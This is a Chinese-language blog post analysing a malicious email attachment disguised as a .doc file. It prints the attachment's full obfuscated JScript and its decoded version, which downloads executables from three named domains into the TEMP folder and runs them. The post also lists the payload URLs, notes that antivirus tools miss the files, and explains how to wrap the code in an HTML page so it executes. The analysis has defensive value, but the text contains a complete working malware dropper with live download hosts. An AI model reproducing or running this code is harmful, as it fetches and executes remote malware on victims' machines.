20151205收到一封病毒郵件簡單分析

今天信箱裡收到一封帶附件的英文郵件,這本身就是不正常的,就好奇的將附件下載下來。
20151206020131
zip文件解壓後裡面的文件名字為0000772946.doc.js,看名字就知道是為了讓打開的人以為是doc文件,畢竟作業系統預設是不顯示副檔名的,我用記事本打開,裡面是加密的代碼

var str=”5553565E0D070F05245552574A070B095E255E09111701110949011C1401000D100D0B0A4A16115E17505E5550505D565D5D505C545E55″;var h3=’ xa =’;var l6=’nvi’;var b5=’0; fo’;var o6=’; var’;var o2=’tStr’;var x7=’ dn’;var j0=’spl’;var a6=’ = ‘;var q2=’e ‘;var w1=’veToF’;var x4=’va’;var l7=’ ws’;var n4=’bject’;var a7=’Body’;var t5=’ va’;var b8=’ xa.’;var n7=’Cr’;var j7=’+”.’;var w6='”WScr’;var p3=’; ‘;var q7=’92)+’;var g7=’ =’;var c6=’r) ‘;var f0=’f ‘;var b2=’ject(‘;var f3=’ha’;var z6=’ {‘;var e8=’xpan’;var k6=’d=854′;var u3=’ia’;var l8=’ = ‘;var z7=’ (va’;var v6=’d=’;var y3='[i]’;var d3=’ws.E’;var n8=’umbin’;function u9(){return q3;};var n6='(e’;var y0=’; x’;var u7='{ ‘;var t7=’n+”.e’;var m9=’tch ‘;var g4=’ = ‘;var j5=’ = 0;’;var t6=’; ‘;var r9=’xo =’;var w0=’hell’;var n2='(x’;var g6=’ b’;var t0=’EMP%’;var u1=’SXML2′;var t2=’te’;var m5=’y ‘;var j6=’ills’;var g1=’ript.’;var k3='” ‘;var c8=’om”.’;var r2=’00’;var i0=’ ld’;var o8=’/?i’;var h2=’= ‘;var s1=’/”+b’;var p5=’o.r’;var e5=’tr+’;var z8=’ i<b’;var a1=’on =’;var p8=’coun’;var x5=’ 0; ‘;var v2=’r ‘;var o4=’n, fa’;var p9=’ject(‘;var p0=’ i; b’;var s5=’ings(‘;var e9=’ter’;var l3=’xe”,1′;var u4=’f (xo’;var u0=’.le’;var w4=’ld’;var m1=’ndern’;var j8=’rCod’;var f2=’:/’;var z1=’t.Cr’;var a3=’lse);’;var v4=’.send’;var b9=’r ‘;var y1=’ti’;var n0=’ }’;var t8=’se();’;var d6=’ }; i’;var r5=’nm’;var m2='”); ‘;var x0=’pe ‘;var m8=’009″+’;var i2='(“ADO’;var z2=’ { va’;var o9=’xa.o’;var r7=’Str’;var v9='”%T’;var v0=’,2)’;var s3=’}; };’;var o7=’+)’;var j2=’tp’;var x1=’wri’;var q5=’re’;var o3=’t.S’;var i4=’a.’;var w3=’exe”‘;var m0=’a.’;var s0=’ } ca’;var i6=’ (er)’;var s9=’ile(‘;var h5=’ WSc’;var l4=’n(f’;var x2=’var’;var h9=’tr’;var e3=’ WS’;var c9=’xa.’;var l0=’; xa.’;var b3=’ va’;var n1=’TTP”)’;var d1=’= 1′;var k8='”1523′;var f8=’ea’;var i5='”hi’;var i8=’var’;var a8=’> 10′;var y8=’com ‘;var j9=’= 2’;var l9=’e(‘;var q8=’om ki’;var g8=’1) {‘;var i9=’ws.Ru’;var d2=’dE’;var w8=’00)’;var p7=’g.c’;var a4=’eO’;var q1=’) ‘;var k5=’+”/’;var v1=’1; x’;var g9=’ W’;var f5=’.stat’;var n5=’clo’;var r3=’ip’;var a2=’te’;var y4=’.c’;var l1=’ =’;var r4='{ xo.’;var k1=’eat’;var k0=’ld;’;var q4=’ fn ‘;var t4=’estmu’;var r1=’ea’;var x9=’.XM’;var s8=’};’;var f6=’us =’;var w9='”&rn’;var c3=’crip’;var c2=’ddenh’;var q0=’) { ‘;var e0=’,0′;var p2='”GET’;var z3=’38”;’;var r6=’r dn’;var d4=’fn+n’;var h4='(d’;var h0=’; var’;var m3=’LH’;var c4=’m”);’;var g2=’reak;’;var g0=’);’;var i7=’ca’;var g3=’ }’;var o0=”;var q3=eval;var n3=”;var i1=’it(‘;var b6=’open(‘;var v7=’n == ‘;var k4=’Ob’;var b7=’);’;var a9=’; } ‘;var m7='”)’;var x3='(); i’;var e6='”M’;var e7='”,”ht’;var z4=’tch’;var t9=’ro’;var q9=’xa.’;var d7=’ {‘;var p6=’ xo’;var o5=’n+’;var o1=’++’;var t1=’y { ‘;var b4=’pl’;var j3='”)+S’;var u2=’r i=’;var b0=’en’;var h6=’ngth;’;var m6=’r (‘;var a0=’=3; n’;var k9=’ tr’;var f9=’sa’;var y2='{ }; ‘;var h1=’siz’;var c5=’ahm’;var w2=’for’;var s2=’pen()’;var u8=’Scrip’;var u5=’ad’;var s7=’g.fr’;var v8=’es’;var z9=’han’;var j4=’; n<‘;var v3=’t.C’;var m4=’ateOb’;var h7=’f (‘;var w5=’ty’;var s6=’ i+’;var y5='”+s’;var k2=’DB.’;var s4=’ i’;var w7=’trin’;var f7=’omC’;var p4=’r n=1′;var y9=’posi’;var c1=’ponse’;var p1=’mbai.’;n3=i8;o0+=n3;n3=g6;o0+=n3;n3=a6;o0+=n3;n3=i5;o0+=n3;n3=c2;o0+=n3;n3=j6;o0+=n3;n3=b4;o0+=n3;n3=n8;o0+=n3;n3=p7;o0+=n3;n3=q8;o0+=n3;n3=m1;o0+=n3;n3=t4;o0+=n3;n3=p1;o0+=n3;n3=y8;o0+=n3;n3=c5;o0+=n3;n3=u5;o0+=n3;n3=z9;o0+=n3;n3=u3;o0+=n3;n3=y4;o0+=n3;n3=c8;o0+=n3;n3=j0;o0+=n3;n3=i1;o0+=n3;n3=k3;o0+=n3;n3=m7;o0+=n3;n3=h0;o0+=n3;n3=l7;o0+=n3;n3=g7;o0+=n3;n3=g9;o0+=n3;n3=u8;o0+=n3;n3=v3;o0+=n3;n3=q5;o0+=n3;n3=m4;o0+=n3;n3=p9;o0+=n3;n3=w6;o0+=n3;n3=r3;o0+=n3;n3=o3;o0+=n3;n3=w0;o0+=n3;n3=m2;o0+=n3;n3=x2;o0+=n3;n3=q4;o0+=n3;n3=h2;o0+=n3;n3=d3;o0+=n3;n3=e8;o0+=n3;n3=d2;o0+=n3;n3=l6;o0+=n3;n3=t9;o0+=n3;n3=r5;o0+=n3;n3=b0;o0+=n3;n3=o2;o0+=n3;n3=s5;o0+=n3;n3=v9;o0+=n3;n3=t0;o0+=n3;n3=j3;o0+=n3;n3=w7;o0+=n3;n3=s7;o0+=n3;n3=f7;o0+=n3;n3=f3;o0+=n3;n3=j8;o0+=n3;n3=l9;o0+=n3;n3=q7;o0+=n3;n3=k8;o0+=n3;n3=z3;o0+=n3;n3=t5;o0+=n3;n3=b9;o0+=n3;n3=r9;o0+=n3;n3=e3;o0+=n3;n3=c3;o0+=n3;n3=z1;o0+=n3;n3=f8;o0+=n3;n3=a2;o0+=n3;n3=k4;o0+=n3;n3=b2;o0+=n3;n3=e6;o0+=n3;n3=u1;o0+=n3;n3=x9;o0+=n3;n3=m3;o0+=n3;n3=n1;o0+=n3;n3=o6;o0+=n3;n3=h3;o0+=n3;n3=h5;o0+=n3;n3=g1;o0+=n3;n3=n7;o0+=n3;n3=k1;o0+=n3;n3=a4;o0+=n3;n3=n4;o0+=n3;n3=i2;o0+=n3;n3=k2;o0+=n3;n3=r7;o0+=n3;n3=r1;o0+=n3;n3=c4;o0+=n3;n3=b3;o0+=n3;n3=v2;o0+=n3;n3=w4;o0+=n3;n3=l8;o0+=n3;n3=b5;o0+=n3;n3=m6;o0+=n3;n3=x4;o0+=n3;n3=p4;o0+=n3;n3=j4;o0+=n3;n3=a0;o0+=n3;n3=o1;o0+=n3;n3=q1;o0+=n3;n3=u7;o0+=n3;n3=w2;o0+=n3;n3=z7;o0+=n3;n3=u2;o0+=n3;n3=k0;o0+=n3;n3=z8;o0+=n3;n3=u0;o0+=n3;n3=h6;o0+=n3;n3=s6;o0+=n3;n3=o7;o0+=n3;n3=z2;o0+=n3;n3=r6;o0+=n3;n3=j5;o0+=n3;n3=k9;o0+=n3;n3=m5;o0+=n3;n3=r4;o0+=n3;n3=b6;o0+=n3;n3=p2;o0+=n3;n3=e7;o0+=n3;n3=j2;o0+=n3;n3=f2;o0+=n3;n3=s1;o0+=n3;n3=y3;o0+=n3;n3=k5;o0+=n3;n3=p8;o0+=n3;n3=e9;o0+=n3;n3=o8;o0+=n3;n3=v6;o0+=n3;n3=y5;o0+=n3;n3=e5;o0+=n3;n3=w9;o0+=n3;n3=k6;o0+=n3;n3=m8;o0+=n3;n3=o4;o0+=n3;n3=a3;o0+=n3;n3=p6;o0+=n3;n3=v4;o0+=n3;n3=x3;o0+=n3;n3=u4;o0+=n3;n3=f5;o0+=n3;n3=f6;o0+=n3;n3=j9;o0+=n3;n3=r2;o0+=n3;n3=q0;o0+=n3;n3=o9;o0+=n3;n3=s2;o0+=n3;n3=l0;o0+=n3;n3=w5;o0+=n3;n3=x0;o0+=n3;n3=d1;o0+=n3;n3=y0;o0+=n3;n3=i4;o0+=n3;n3=x1;o0+=n3;n3=t2;o0+=n3;n3=n2;o0+=n3;n3=p5;o0+=n3;n3=v8;o0+=n3;n3=c1;o0+=n3;n3=a7;o0+=n3;n3=g0;o0+=n3;n3=s4;o0+=n3;n3=h7;o0+=n3;n3=q9;o0+=n3;n3=h1;o0+=n3;n3=q2;o0+=n3;n3=a8;o0+=n3;n3=w8;o0+=n3;n3=z6;o0+=n3;n3=x7;o0+=n3;n3=g4;o0+=n3;n3=v1;o0+=n3;n3=m0;o0+=n3;n3=y9;o0+=n3;n3=y1;o0+=n3;n3=a1;o0+=n3;n3=x5;o0+=n3;n3=c9;o0+=n3;n3=f9;o0+=n3;n3=w1;o0+=n3;n3=s9;o0+=n3;n3=d4;o0+=n3;n3=j7;o0+=n3;n3=w3;o0+=n3;n3=v0;o0+=n3;n3=t6;o0+=n3;n3=h9;o0+=n3;n3=t1;o0+=n3;n3=i9;o0+=n3;n3=l4;o0+=n3;n3=o5;o0+=n3;n3=t7;o0+=n3;n3=l3;o0+=n3;n3=e0;o0+=n3;n3=b7;o0+=n3;n3=s0;o0+=n3;n3=z4;o0+=n3;n3=i6;o0+=n3;n3=d7;o0+=n3;n3=n0;o0+=n3;n3=p3;o0+=n3;n3=s8;o0+=n3;n3=b8;o0+=n3;n3=n5;o0+=n3;n3=t8;o0+=n3;n3=d6;o0+=n3;n3=f0;o0+=n3;n3=h4;o0+=n3;n3=v7;o0+=n3;n3=g8;o0+=n3;n3=i0;o0+=n3;n3=l1;o0+=n3;n3=p0;o0+=n3;n3=g2;o0+=n3;n3=g3;o0+=n3;n3=a9;o0+=n3;n3=i7;o0+=n3;n3=m9;o0+=n3;n3=n6;o0+=n3;n3=c6;o0+=n3;n3=y2;o0+=n3;n3=s3;o0+=n3;u9()(o0);

經過解密後為

var b = “hiddenhillsplumbing.com kindernestmumbai.com ahmadhania.com”.split(” “); var ws = WScript.CreateObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+”152338″; var xo = WScript.CreateObject(“MSXML2.XMLHTTP”); var xa = WScript.CreateObject(“ADODB.Stream”); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i<b.length; i++) { var dn = 0; try { xo.open(“GET”,”http://”+b[i]+”/counter/?id=”+str+”&rnd=854009″+n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+”.exe”,2); try { ws.Run(fn+n+”.exe”,1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };

這樣會下載
http://hiddenhillsplumbing.com/counter/?id=生成的ID&rnd=8540091
http://hiddenhillsplumbing.com/counter/?id=生成的ID&rnd=8540092
http://hiddenhillsplumbing.com/counter/?id=生成的ID&rnd=8540093

http://kindernestmumbai.com/counter/?id=生成的ID&rnd=8540091
http://kindernestmumbai.com/counter/?id=生成的ID&rnd=8540092
http://kindernestmumbai.com/counter/?id=生成的ID&rnd=8540093

http://ahmadhania.com/counter/?id=生成的ID&rnd=8540091
http://ahmadhania.com/counter/?id=生成的ID&rnd=8540092
http://ahmadhania.com/counter/?id=生成的ID&rnd=8540093

“生成的ID”會很長,但隨便填個數字就可以下載下來文件,下載下來的都是gif文件,但實際上都是exe文件,目前為止很多防毒軟體還是無法識別。

截至發稿時,谷歌已經會認為第一個域名上有發現惡意頂軟體,但第二個還是第三個都是可以正常訪問。

如果直接執行代碼,是會報錯的,需要搭配

<HTML>
<SCRIPT LANGUAGE=”Javascript”>

</SCRIPT>
</HTML>

組合成一個完整的網頁就可以執行了,但因為是病毒網頁,請謹慎哦~